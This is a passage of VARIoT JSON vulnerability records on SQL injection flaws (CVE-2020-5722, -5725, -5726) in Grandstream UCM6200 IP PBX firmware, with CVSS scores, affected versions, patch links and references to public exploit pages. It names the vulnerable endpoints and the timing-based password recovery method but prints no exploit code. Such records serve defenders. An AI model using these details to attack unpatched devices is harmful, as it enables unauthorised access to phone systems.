"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2020-5722",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-23201"
},
{
"db": "VULMON",
"id": "CVE-2020-5722"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003190"
},
{
"db": "PACKETSTORM",
"id": "165708"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1337"
},
{
"db": "NVD",
"id": "CVE-2020-5722"
}
]
},
"id": "VAR-202003-1435",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-23201"
}
],
"trust": 1.45714287
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-23201"
}
]
},
"last_update_date": "2024-01-18T22:55:19.159000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.grandstream.com/"
},
{
"title": "Patch for Grandstream UCM6200 SQL injection vulnerability (CNVD-2020-23201)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/214293"
},
{
"title": "Grandstream UCM6200 SQL Repair measures for injecting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=112779"
},
{
"title": "Known Exploited Vulnerabilities Detector",
"trust": 0.1,
"url": "https://github.com/ostorlab/kev "
},
{
"title": "Threatpost",
"trust": 0.1,
"url": "https://threatpost.com/inside-hoaxcalls-botnet-success-failure/156107/"
},
{
"title": "Threatpost",
"trust": 0.1,
"url": "https://threatpost.com/fast-moving-ddos-botnet-unpatched-zyxel-rce-bug/155059/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-23201"
},
{
"db": "VULMON",
"id": "CVE-2020-5722"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003190"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1337"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-89",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-003190"
},
{
"db": "NVD",
"id": "CVE-2020-5722"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.7,
"url": "http://packetstormsecurity.com/files/156876/ucm6202-1.0.18.13-remote-command-injection.html"
},
{
"trust": 2.3,
"url": "http://packetstormsecurity.com/files/165708/grandstream-ucm62xx-ip-pbx-sendpasswordemail-remote-code-execution.html"
},
{
"trust": 1.7,
"url": "https://www.tenable.com/security/research/tra-2020-15"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-5722"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-5722"
},
{
"trust": 0.7,
"url": "https://www.exploit-db.com/exploits/48247"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/89.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://threatpost.com/fast-moving-ddos-botnet-unpatched-zyxel-rce-bug/155059/"
},
{
"trust": 0.1,
"url": "http://www.grandstream.com/\","
},
{
"trust": 0.1,
"url": "https://metasploit.com/download"
},
{
"trust": 0.1,
"url": "https://github.com/rapid7/metasploit-framework"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-23201"
},
{
"db": "VULMON",
"id": "CVE-2020-5722"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003190"
},
{
"db": "PACKETSTORM",
"id": "165708"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1337"
},
{
"db": "NVD",
"id": "CVE-2020-5722"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-23201"
},
{
"db": "VULMON",
"id": "CVE-2020-5722"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003190"
},
{
"db": "PACKETSTORM",
"id": "165708"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1337"
},
{
"db": "NVD",
"id": "CVE-2020-5722"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-04-17T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-23201"
},
{
"date": "2020-03-23T00:00:00",
"db": "VULMON",
"id": "CVE-2020-5722"
},
{
"date": "2020-04-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-003190"
},
{
"date": "2022-01-25T16:34:16",
"db": "PACKETSTORM",
"id": "165708"
},
{
"date": "2020-03-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202003-1337"
},
{
"date": "2020-03-23T20:15:12.043000",
"db": "NVD",
"id": "CVE-2020-5722"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-04-17T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-23201"
},
{
"date": "2022-02-10T00:00:00",
"db": "VULMON",
"id": "CVE-2020-5722"
},
{
"date": "2020-04-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-003190"
},
{
"date": "2022-01-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202003-1337"
},
{
"date": "2022-02-10T07:31:15.567000",
"db": "NVD",
"id": "CVE-2020-5722"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "165708"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1337"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Grandstream UCM6200 In the series SQL Injection vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-003190"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SQL injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202003-1337"
}
],
"trust": 0.6
}
}
VAR-202003-1438
Vulnerability from variot - Updated: 2023-12-18 12:17The Grandstream UCM6200 series before 1.0.20.22 is vulnerable to an SQL injection via the HTTP server's websockify endpoint. A remote unauthenticated attacker can invoke the login action with a crafted username and, through the use of timing attacks, can discover user passwords. Grandstream UCM6200 is a set of enterprise-level switches used for IP telephone communication by the US company Grandstream. The vulnerability stems from the lack of verification of external input SQL statements by database-based applications. Attackers can use this vulnerability to execute illegal SQL commands
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202003-1438",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ucm6208",
"scope": "lt",
"trust": 1.0,
"vendor": "grandstream",
"version": "1.0.20.22"
},
{
"model": "ucm6204",
"scope": "lt",
"trust": 1.0,
"vendor": "grandstream",
"version": "1.0.20.22"
},
{
"model": "ucm6202",
"scope": "lt",
"trust": 1.0,
"vendor": "grandstream",
"version": "1.0.20.22"
},
{
"model": "ucm6202",
"scope": "eq",
"trust": 0.8,
"vendor": "grandstream",
"version": "1.0.20.22"
},
{
"model": "ucm6204",
"scope": "eq",
"trust": 0.8,
"vendor": "grandstream",
"version": "1.0.20.22"
},
{
"model": "ucm6208",
"scope": "eq",
"trust": 0.8,
"vendor": "grandstream",
"version": "1.0.20.22"
},
{
"model": "ucm6200",
"scope": "lt",
"trust": 0.6,
"vendor": "grandstream",
"version": "1.0.20.22"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-20682"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003470"
},
{
"db": "NVD",
"id": "CVE-2020-5725"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:ucm6202_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "1.0.20.22",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:ucm6202:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:ucm6204_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "1.0.20.22",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:ucm6204:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:ucm6208_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "1.0.20.22",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:ucm6208:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2020-5725"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Jacob Baines",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202003-1715"
}
],
"trust": 0.6
},
"cve": "CVE-2020-5725",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2020-003470",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "HIGH",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 4.9,
"id": "CNVD-2020-20682",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:H/Au:N/C:C/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.2,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "High",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.9,
"baseSeverity": "Medium",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2020-003470",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2020-5725",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "JVNDB-2020-003470",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2020-20682",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202003-1715",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-20682"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003470"
},
{
"db": "NVD",
"id": "CVE-2020-5725"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1715"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The Grandstream UCM6200 series before 1.0.20.22 is vulnerable to an SQL injection via the HTTP server\u0027s websockify endpoint. A remote unauthenticated attacker can invoke the login action with a crafted username and, through the use of timing attacks, can discover user passwords. Grandstream UCM6200 is a set of enterprise-level switches used for IP telephone communication by the US company Grandstream. The vulnerability stems from the lack of verification of external input SQL statements by database-based applications. Attackers can use this vulnerability to execute illegal SQL commands",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-5725"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003470"
},
{
"db": "CNVD",
"id": "CNVD-2020-20682"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2020-5725",
"trust": 3.0
},
{
"db": "TENABLE",
"id": "TRA-2020-17",
"trust": 2.4
},
{
"db": "PACKETSTORM",
"id": "156976",
"trust": 1.6
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003470",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2020-20682",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1715",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-20682"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003470"
},
{
"db": "NVD",
"id": "CVE-2020-5725"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1715"
}
]
},
"id": "VAR-202003-1438",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-20682"
}
],
"trust": 1.45714287
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-20682"
}
]
},
"last_update_date": "2023-12-18T12:17:13.137000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.grandstream.com/"
},
{
"title": "Patch for Grandstream UCM6200 SQL injection vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/211861"
},
{
"title": "Grandstream UCM6200 SQL Repair measures for injecting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=113110"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-20682"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003470"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1715"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-89",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-003470"
},
{
"db": "NVD",
"id": "CVE-2020-5725"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.6,
"url": "http://packetstormsecurity.com/files/156976/grandstream-ucm6200-series-websocket-1.0.20.20-sql-injection.html"
},
{
"trust": 1.6,
"url": "https://www.tenable.com/security/research/tra-2020-17"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-5725"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-5725"
},
{
"trust": 0.8,
"url": "https://jp.tenable.com/security/research/tra-2020-17?tns_redirect=true"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-003470"
},
{
"db": "NVD",
"id": "CVE-2020-5725"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1715"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-20682"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003470"
},
{
"db": "NVD",
"id": "CVE-2020-5725"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1715"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-03-31T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-20682"
},
{
"date": "2020-04-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-003470"
},
{
"date": "2020-03-30T20:15:20.133000",
"db": "NVD",
"id": "CVE-2020-5725"
},
{
"date": "2020-03-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202003-1715"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-04-01T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-20682"
},
{
"date": "2020-04-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-003470"
},
{
"date": "2020-03-31T17:15:26.730000",
"db": "NVD",
"id": "CVE-2020-5725"
},
{
"date": "2020-04-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202003-1715"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202003-1715"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Grandstream UCM6200 SQL injection vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-20682"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1715"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SQL injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202003-1715"
}
],
"trust": 0.6
}
}
VAR-202003-1439
Vulnerability from variot - Updated: 2023-12-18 12:17The Grandstream UCM6200 series before 1.0.20.22 is vulnerable to an SQL injection via the CTI server on port 8888. A remote unauthenticated attacker can invoke the challenge action with a crafted username and discover user passwords. Grandstream UCM6200 is a set of enterprise-level switches used for IP telephone communication by the US company Grandstream
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202003-1439",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ucm6208",
"scope": "lt",
"trust": 1.0,
"vendor": "grandstream",
"version": "1.0.20.22"
},
{
"model": "ucm6204",
"scope": "lt",
"trust": 1.0,
"vendor": "grandstream",
"version": "1.0.20.22"
},
{
"model": "ucm6202",
"scope": "lt",
"trust": 1.0,
"vendor": "grandstream",
"version": "1.0.20.22"
},
{
"model": "ucm6202",
"scope": "eq",
"trust": 0.8,
"vendor": "grandstream",
"version": "1.0.20.22"
},
{
"model": "ucm6204",
"scope": "eq",
"trust": 0.8,
"vendor": "grandstream",
"version": "1.0.20.22"
},
{
"model": "ucm6208",
"scope": "eq",
"trust": 0.8,
"vendor": "grandstream",
"version": "1.0.20.22"
},
{
"model": "ucm6200",
"scope": "lt",
"trust": 0.6,
"vendor": "grandstream",
"version": "1.0.20.22"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-24401"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003471"
},
{
"db": "NVD",
"id": "CVE-2020-5726"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:ucm6202_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "1.0.20.22",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:ucm6202:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:ucm6204_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "1.0.20.22",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:ucm6204:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:ucm6208_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "1.0.20.22",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:ucm6208:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2020-5726"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Jacob Baines",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202003-1716"
}
],
"trust": 0.6
},
"cve": "CVE-2020-5726",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
